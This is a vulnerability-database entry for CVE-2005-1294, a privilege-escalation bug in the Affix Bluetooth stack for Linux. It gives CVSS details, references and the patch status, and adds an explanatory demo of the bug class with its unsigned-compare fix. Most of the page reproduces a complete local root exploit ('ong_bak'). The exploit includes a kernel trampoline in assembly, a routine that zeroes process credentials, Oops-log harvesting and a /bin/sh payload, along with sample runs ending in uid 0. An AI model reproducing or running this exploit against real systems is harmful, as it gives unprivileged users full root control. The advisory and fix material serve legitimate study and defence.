CVE-2005-1294
CVSS 7.2
Published: 2005-04-24 00:00:00
Revised: 2016-10-17 23:18:42

[Original] The affix_sock_register in the Affix Bluetooth Protocol Stack for Linux might allow local users to gain privileges via a socket call with a negative protocol value, which is used as an array index.


[CNNVD] Nokia Affix Bluetooth Protocol Stack Privilege Escalation Vulnerability (CNNVD-200504-089)

        Affix is a Bluetooth protocol stack for Linux developed by Nokia and released under the GPL. Affix supports the core Bluetooth protocols, including HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM and SDP.
        affix_sock_register in the Affix Bluetooth protocol stack for Linux may allow a local user to gain privileges via a socket call that passes a negative protocol value, which is then used as an array index.

- CVSS (Base Score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can bring the system down completely]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1294
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1294
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-089
(official data source) CNNVD

- Other Links and Resources

http://affix.sourceforge.net/patch_hci_3_2_0
(PATCH) CONFIRM
http://marc.info/?l=bugtraq&m=111445064725591&w=2
(UNKNOWN) BUGTRAQ 20050424 DMA[2005-0423a] - 'Nokia Affix Bluetooth Integer Underflow'
http://www.digitalmunition.com/DMA%5B2005-0423a%5D.txt
(UNKNOWN) MISC

- Vulnerability Information

Nokia Affix Bluetooth Protocol Stack Privilege Escalation Vulnerability
High risk  Unknown
2005-04-24 00:00:00 2005-10-20 00:00:00
Local

- Advisories and Patches


- Vulnerability Information (926)

Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) (EDBID:926)
linux local
2005-10-26 Verified
0 qobaiashi
N/A
/*

Due to many responses I've improved the exploit
to cover more systems!


  ONG_BAK v0.9   [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes

qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9  -by qobaiashi-
 |
 |- i've found kernel 2.6.11.4-20a-default
 |- trampoline is at 0x804869c
 |- trying...
 |- [ecx: bf8d0000 ]
 |- suitable value found!using 0xbf8d0000
 |- the time has come to push the button...
sh-3.00# exit






  ONG_BAK v0.3   [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!



  ONG_BAK v0.1   [april 4th 05]
"""""""""""""""""""""""""""""""""

local root exploit for the bluetooth bug

usage:

the bug is quite stable so you can't really fuck things up
if you stick to the following:

play around with the negative argument until ecx points to 
our data segment:


qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0809da40 ]
 |- suitable value found!using 0x0809da40
 |- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>



that's it.
unfortunately it's not yet very practicable..

qobaiashi@u-n-f.com

*/

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>

/* 32-bit x86, kernel 2.6 only: the trampoline hard-codes i386 user segment
 * selectors, the 8 KiB kernel-stack mask that locates thread_info, and
 * 32-bit pointer casts. Build with -m32 and link against libbluetooth. */

void usage(char *path);

//===================[ kernel 2.6* privilege elevator ]===============================
//===================[      qobaiashi@u-n-f.com       ]===============================
//globals
int uid, gid;

/* Kernel-mode entry point reached through the corrupted function pointer;
 * defined by the asm block below, so only declared here. */
extern void load_highlevel(void);

__asm__
(
"load_highlevel:         \n"
"xor    %eax, %eax       \n"
"mov    $0xffffe000, %eax\n"      // 8 KiB kernel stack: esp & ~0x1fff is thread_info
"and    %esp,%eax        \n"
"pushl  %eax             \n"
"call   set_root         \n"      // set_root(thread_info)
"pop    %eax             \n"
//ret to userspace-2.6.* version
" cli                    \n"
" pushl $0x7b            \n"      //DS user selector
" pop   %ds              \n"
" pushl %ds              \n"      //SS
" pushl $0xc0000000      \n"      //ESP
" pushl $0x246           \n"      //EFLAGS
" pushl $0x73            \n"      //CS user selector
" pushl $shellcode       \n"      //EIP must not be a push /bin/sh shellcode!!
"iret                    \n"
);

/* Runs in kernel mode. thread_info->task is the first field, so *ts is the
 * current task_struct. Scan it for the uid,euid,suid,fsuid,gid,egid,... run
 * that matches our own credentials and zero uid, euid, gid and egid. */
void set_root(unsigned int *ts)
{
    int cntr;
    ts = (unsigned int *)*ts;
    //hope you guys are int aligned
    for (cntr = 0; cntr <= 512; cntr++, ts++)
        if (ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
            ts[0] = ts[1] = ts[4] = ts[5] = 0;
}

/* Reached in user mode through the iret above, now running as uid 0. */
void shellcode(void)
{
    system("/bin/sh");
    exit(0);
}
//====================================================================================
//====================================================================================

int main(int argc, char *argv[])
{
    char buf[2048];
    int sock, i;
    void *mod = 0;              /* page-aligned base of the mapping we need */
    void *linker = 0;
    unsigned int *ecx = 0;      /* address the kernel dereferenced, taken from the Oops */
    unsigned int arg;
    int tmp;
    char *check;
    struct utsname vers;

    gid = getgid();
    uid = getuid();

    printf("-|-bluez local root exploit v.0.9  -by qobaiashi-\n |\n");
    if (uname(&vers) < 0)
        printf(" |- couldn't determine kernel version\n");
    else
        printf(" |- i've found kernel %s\n", vers.release);

    printf(" |- trampoline is at %p\n", (void *)&load_highlevel);

    if (argc < 2) {
        usage(argv[0]);
        exit(1);
    }

    /* The negative protocol number; strtoul wraps it to the unsigned value
     * that socket() hands to the kernel. */
    arg = strtoul(argv[1], 0, 0);

    if (fork() != 0) { //parent watch the Oops
        /* The child below provokes the Oops; read it back out of the kernel
         * log (SYSLOG_ACTION_READ_ALL = 3) to learn where ecx pointed. */
        usleep(1000);
        if ((tmp = klogctl(3, buf, 1700)) > -1) {
            buf[tmp] = '\0';
            check = strstr(buf, "ecx: ");
            if (check == NULL) {
                printf(" |- no Oops with an ecx value in the kernel log\n");
                return 1;
            }
            printf(" |- [%.14s]\n", check);
            check += 5;                 /* skip "ecx: " */
            check[8] = '\0';            /* eight hex digits */
            ecx = (unsigned int *)strtoul(check, 0, 16);
            //page align FIXME: might be buggy
            mod = (void *)((uintptr_t)ecx & ~(uintptr_t)0xfff);
            linker = mmap(mod, 0x2000, PROT_WRITE | PROT_READ,
                          MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
            if (linker == mod) { //we could mmap the area
                printf(" |- suitable value found!using %p\n", mod);
                printf(" |- the time has come to push the button... \n");
                for (i = 0; i <= 1; i++)                      //use ecx
                    *(ecx++) = (unsigned int)(uintptr_t)&load_highlevel;   //link to shellcode
            } else {
                printf(" |- could not mmap   %p\n", mod);
                /* Fall back to growing the heap over the address instead. */
                if (brk((char *)mod + 0x200) == -1) {
                    printf(" |- could not brk to %p\n", mod);
                    printf(" `-------------------------------\n");
                    exit(-1);
                }
                //here we did it
                printf(" |- suitable value found!using %p\n", mod);
                printf(" |- the time has come to push the button... \n");
                for (i = 0; i <= 1; i++)                      //use ecx
                    *(ecx++) = (unsigned int)(uintptr_t)&load_highlevel;   //link to shellcode
            }
            /* Second trigger: the kernel now reads our pointer from the
             * address in ecx and jumps to load_highlevel. */
            if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
                exit(1);
        }
        return 0;
    }

    if (fork() == 0) { //child does the pre-exploit
        /* First trigger: this socket() call Oopses and is killed; the parent
         * harvests the register dump it leaves in the kernel log. */
        printf(" |- trying...\n");
        if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) {
            printf(" |- something went w0rng (invalid value)\n");
            exit(1);
        }
    }

    exit(0);
}



/*****************\
|**    usage    **|
\*****************/
void usage(char *path)
{
    printf(" |----------------------------\n");
    printf(" | usage: %s <negative value> \n", path);
    printf(" | tested:\n");
    printf(" | SuSE 9.1:      -10023411  \n");
    printf(" |                -41122122 \n");
    printf(" | Kernel 2.6.11: -10023 \n");
    printf(" | SuSE 9.3:      -100222\n");
    printf(" |                -102901\n");
    printf(" `-----------------------\n");
    exit(0);
}

// 1st post: milw0rm.com [2005-04-09]

// milw0rm.com [2005-10-26]

- Vulnerability Information

15783
Affix affix_sock_register() Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

A local integer underflow exists in Affix. The 'affix_sock_register()' function does not check the lower bound of the protocol number before using it as an array index. By supplying a negative protocol value when creating a socket in the 'PF_AFFIX' communication domain, a local user can gain root privileges, resulting in a loss of integrity.
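The following is an added illustration written for this page, not Affix or ong_bak code, of the bug class the entries above describe for affix_sock_register(): the protocol argument of socket(2) is a signed int, and a table lookup that checks only the upper bound lets a negative protocol index memory in front of the table. The table size, the protocol names and attacker_payload() standing in for ong_bak's trampoline are assumptions made for the example; the two slab[] slots in front of proto_table exist only to keep the out-of-bounds access inside one object so the demo is well defined, and the real kernel has no such guard.

```c
/*
 * Added example (not Affix or ong_bak code): a per-protocol table indexed
 * by the signed protocol number from socket(2). Table size, protocol names
 * and attacker_payload() are assumptions for the illustration.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define PROTO_MAX 4

struct proto_ops {
    const char *name;
    int (*create)(void);
};

/* proto_table[-1] is slab[1], proto_table[-2] is slab[0]: these stand in
 * for whatever memory precedes the real table in the kernel. */
static struct proto_ops slab[2 + PROTO_MAX];
static struct proto_ops *const proto_table = slab + 2;

static int hci_create(void)       { return 1; }
static int attacker_payload(void) { return 1337; }   /* stands in for the exploit's trampoline */

/* Vulnerable registration: signed compare against the upper bound only. */
int register_vuln(int proto, const struct proto_ops *ops)
{
    if (proto >= PROTO_MAX)            /* -2 >= 4 is false, so -2 passes */
        return -EINVAL;
    if (proto_table[proto].create)
        return -EBUSY;
    proto_table[proto] = *ops;         /* proto = -2 writes slab[0] */
    return 0;
}

/* Hardened registration: compare as unsigned so every negative value is
 * out of range; `proto < 0 || proto >= PROTO_MAX` is the equivalent check. */
int register_fixed(int proto, const struct proto_ops *ops)
{
    if ((unsigned int)proto >= PROTO_MAX)
        return -EINVAL;
    if (proto_table[proto].create)
        return -EBUSY;
    proto_table[proto] = *ops;
    return 0;
}

/* Vulnerable socket creation, the path socket(AF_x, SOCK_RAW, proto)
 * reaches. With a negative proto the function pointer is fetched from
 * memory in front of the table, which the exploit on this page fills by
 * mapping the page the Oops reports in ecx. */
int create_vuln(int proto)
{
    if (proto >= PROTO_MAX)
        return -EINVAL;
    if (!proto_table[proto].create)
        return -EPROTONOSUPPORT;
    return proto_table[proto].create();
}

int create_fixed(int proto)
{
    if ((unsigned int)proto >= PROTO_MAX)
        return -EINVAL;
    if (!proto_table[proto].create)
        return -EPROTONOSUPPORT;
    return proto_table[proto].create();
}

/* Constructed state for the demo: one legitimate protocol registered, and
 * the memory in front of the table holding an attacker-chosen pointer. */
void setup_tables(void)
{
    memset(slab, 0, sizeof slab);
    proto_table[0].name = "hci";
    proto_table[0].create = hci_create;
    slab[1].name = "memory before the table";
    slab[1].create = attacker_payload;
}

int main(void)
{
    struct proto_ops bogus = { "bogus", attacker_payload };

    setup_tables();
    printf("create_vuln(0)     = %d\n", create_vuln(0));
    printf("create_vuln(-1)    = %d  <- attacker_payload ran\n", create_vuln(-1));
    printf("create_fixed(-1)   = %d  (-EINVAL)\n", create_fixed(-1));
    printf("register_vuln(-2)  = %d  <- wrote slab[0]\n", register_vuln(-2, &bogus));
    printf("register_fixed(-2) = %d  (-EINVAL)\n", register_fixed(-2, &bogus));
    return 0;
}
```

create_vuln(-1) runs attacker_payload because `proto >= PROTO_MAX` is a signed comparison that -1 satisfies trivially; the unsigned comparison in the fixed variants turns every negative value into a large one and rejects it, which is the shape of the fix for this class of bug regardless of how the stack lays out its tables.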

- Timeline

2005-04-24 2005-04-16
2005-04-24 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Dmitry Kasatkin has released a patch to address this vulnerability.

- References

- Vulnerability Author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.